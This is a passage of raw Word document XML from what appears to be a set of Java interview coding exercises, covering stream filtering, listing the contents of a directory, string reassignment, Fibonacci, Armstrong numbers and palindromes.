          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444C4ED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3E79D3D7"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0C65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6767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7A774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6A3FFC9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33CB416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p>
    <w:p w14:paraId="17988D2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p>
    <w:p w14:paraId="526C7D6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271440B3"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02C9C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 (Java 8 Stream):"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39048ED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EE8D85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0AD0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BB494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5F65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Java development"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F741A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9DFD9C" w14:textId="459DEB3C"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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Syste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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>o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println</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Input: "</w:t>
      </w:r>
      <w:r w:rsidR="00E556C7"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 xml:space="preserve"> input</w:t>
      </w:r>
      <w:r w:rsidR="00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4816F2A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7FE96" w14:textId="07DBA84B"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p>
    <w:p w14:paraId="379E807B" w14:textId="033A0C9E"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UsingStrea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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD2C655" w14:textId="3570AAE9"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574642CA" w14:textId="0A4686A5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D091C8" w14:textId="77777777" w:rsidR="00E556C7" w:rsidRPr="00CE4B95" w:rsidRDefault="00E556C7" w:rsidP="00E556C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46E58004" w14:textId="39728FCF" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="365" w:name="_Toc197867579"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="003A1922" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Find Employee with age greater than 15</w:t>
      </w:r>
      <w:bookmarkEnd w:id="365"/>
    </w:p>
    <w:p w14:paraId="77466AA4" w14:textId="77777777" w:rsidR="00CE749B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00CE749B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00CE749B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a java 8 code to get the age greater than 15 from the Employee object?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637613D5" w14:textId="77777777" w:rsidR="00CE749B" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE749B" w:rsidP="00CE749B">
      <w:pPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Input - Employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E3AEC4"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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B46D9F"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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6CFD1B" w14:textId="74DE2D1F" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE749B" w:rsidP="00D8438E">
      <w:pPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0936E4FB" w14:textId="18F45D5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12269B3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E64AD"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0921C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62B77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2257C6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322D8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AC874D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7376CC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745577E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E659D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5911ADD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64669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2640577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67AE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0935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0E71388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2C7F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20F4E8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3DF5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DCE29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D21E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E3A887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2062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023C7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578B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6B84F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2341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8737A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6B6DF9B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751301B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5573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5ED5E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1F14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p>
    <w:p w14:paraId="53D277F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509DD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Fil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3FE8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09189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19A5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list of Employee objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318A157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1966D36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p>
    <w:p w14:paraId="18C9918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07DFCF5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30220F6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5B5B1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465D74A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5148C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616B1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lter employees with age greater than 15 using Java 8 Stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1355E35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tered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0FF4AD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loye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3CE7B3F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FF0B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C7E5A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filtered employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C2070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s with age greater than 15:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48940C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filtered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2A03D1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667073" w14:textId="2118A870"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E909A6" w14:textId="77777777" w:rsidR="003A1922" w:rsidRPr="00CE4B95" w:rsidRDefault="003A1922" w:rsidP="003A1922">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19FB2184" w14:textId="15B1CBC8" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="366" w:name="_Toc197867580"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program –</w:t>
      </w:r>
      <w:r w:rsidR="00ED3A54" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Get a list of files and directories by passing path of directory</w:t>
      </w:r>
      <w:bookmarkEnd w:id="366"/>
    </w:p>
    <w:p w14:paraId="52417E7F" w14:textId="3BCE6093"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041DC2" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to get a list of files and directories by passing the path of the directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359EBB29" w14:textId="0BBD422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p>
    <w:p w14:paraId="65B85F83"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6D350D7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275359A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2AB5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DirectoryLis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93FC6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245CB9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F213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list to hold the names of files and directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CAF76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eAndDirecto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68206E1"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4EC5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File object for the given directory path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ED18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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> direct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07DFD7F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6DC87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given path is a valid directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB183D5"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1B581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all files and directories within the specified directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680F892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p>
    <w:p w14:paraId="370C8CD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848D8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ach file/directory name to the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3336DB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114F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m</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250F413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45DF3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91A4C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AADE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specified path is not a valid directory."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219D268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C76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8EA5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p>
    <w:p w14:paraId="0ED3786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BDFA7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3F00F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15247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directory path, replace with a valid path on your system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7224415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ers/YourUsername/Docu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for Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EC9B1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5FF58"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list of files and directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C21ABE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52CCD46C"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E17B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CE09136"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s and Directorie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E2F944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257D1C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2050" w14:textId="006D7E4E"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6D2AA65" w14:textId="77777777" w:rsidR="00E974A2" w:rsidRPr="00CE4B95" w:rsidRDefault="00E974A2" w:rsidP="00E974A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="257ED263" w14:textId="5A924056" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="367" w:name="_Toc197867581"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="0093222B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Find Output</w:t>
      </w:r>
      <w:bookmarkEnd w:id="367"/>
    </w:p>
    <w:p w14:paraId="69B688C4" w14:textId="77777777" w:rsidR="00A669DF" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00A669DF">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00A669DF" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>What is the output of the below snippet if we print str?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA9BA12" w14:textId="4B4A6F53" w:rsidR="00A669DF" w:rsidRPr="00CE4B95" w:rsidRDefault="00A669DF" w:rsidP="00A669DF">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ing str =”India”;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D59E62D" w14:textId="019D9C65" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00A669DF" w:rsidP="00A669DF">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 = “Bharat”;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029CEB14" w14:textId="608040DA" w:rsidR="0093222B" w:rsidRPr="00CE4B95"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dia"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D7F368"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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harat"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410A6D64" w14:textId="19AB0661"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1FF8AC" w14:textId="78B12026" w:rsidR="00FB16E6" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ou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harat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB65D48" w14:textId="77777777" w:rsidR="000A7823" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7823" w:rsidP="000A7823">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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3825746A"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Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEFD782"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meaning once a String object is created, it cannot be changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2B5743"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you can reassign</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the reference variable (str) to point to a new String object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBF98A8"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the code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D502D7D"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tring str = "India"; — creates a String object "India" and assigns it to str.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EDE0B0"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 xml:space="preserve">str = "Bharat"; — now str points to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> String object "Bharat".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD19654"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o when you print str, it refers to "Bharat".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D5E310" w14:textId="77777777" w:rsidR="00FB16E6" w:rsidRPr="00CE4B95" w:rsidRDefault="00FB16E6" w:rsidP="00BC56B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49886643" w14:textId="6E9CB1CF" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="368" w:name="_Toc197867582"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00A44B05" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Fibonacci series of nth number</w:t>
      </w:r>
      <w:bookmarkEnd w:id="368"/>
    </w:p>
    <w:p w14:paraId="626EB733" w14:textId="7BB8C69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39F021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31783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DDD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884E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print Fibonacci series up to n terms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A27F40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CAD67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92661B"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63C9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7B2C022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5C4A1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935B2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51CB8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D4EA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ute next term</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28362C50"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14EC8C9"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679AB0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04A3D80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286B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17DB7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4B907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2FBF4"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65B892B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number of terms: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E220F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2218A34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3D20D5"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122141C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A6AF6D" w14:textId="29A240C1" w:rsidR="00A44B05" w:rsidRPr="00CE4B95"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ADCD4F" w14:textId="77777777" w:rsidR="00A44B05" w:rsidRPr="00CE4B95" w:rsidRDefault="00A44B05" w:rsidP="00A44B05">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F17FF3" w14:textId="6C7A1A45" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="369" w:name="_Toc197867583"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00FD5823" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Armstrong number</w:t>
      </w:r>
      <w:bookmarkEnd w:id="369"/>
    </w:p>
    <w:p w14:paraId="346C32B8" w14:textId="37BE36B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7A1BA8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1C255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mstrong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D08724"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D4D7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0A7F7"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5568863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5F2FEB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7622BEE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02402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477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44A61F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449C23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50ECEF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6DBE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CE342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4EB2DDA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F5A8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71436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3406D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1F7049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5C785F0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10E1D27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umericValue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42546AB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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8F950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p>
    <w:p w14:paraId="0E54E22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746C8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32751F2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393BB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B5A55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93DE3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22C15421"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number to check if it's an Armstrong number: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC52F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40C0414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95E15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rmstr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F2B38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an Armstrong number."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DF061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FA2A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NOT an Armstrong number."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613D51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6DB0DE"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BAC4" w14:textId="681803EA"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F131DC" w14:textId="77777777" w:rsidR="00D51710" w:rsidRPr="00CE4B95" w:rsidRDefault="00D51710" w:rsidP="00D51710">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35E29F00" w14:textId="36215531" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="370" w:name="_Toc197867584"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00EB33BE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Print possible set of Palindrome for given String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="370"/>
    </w:p>
    <w:p w14:paraId="241F77DB" w14:textId="77777777" w:rsidR="00AC4687"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a possible set of palindromes of a given string?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6645C4D4" w14:textId="4492E43B"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BBAAAAABBA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9CE2AB" w14:textId="524A905C"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B, BB, AA, AAA, AAAA, AAAAA, ABBA, BAAAAAB, BBAAAAABB,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FA9AE4" w14:textId="4F3F259D" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00AC4687" w:rsidP="00AC4687">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ABBAAAAABBA</w:t>
      </w:r>
    </w:p>
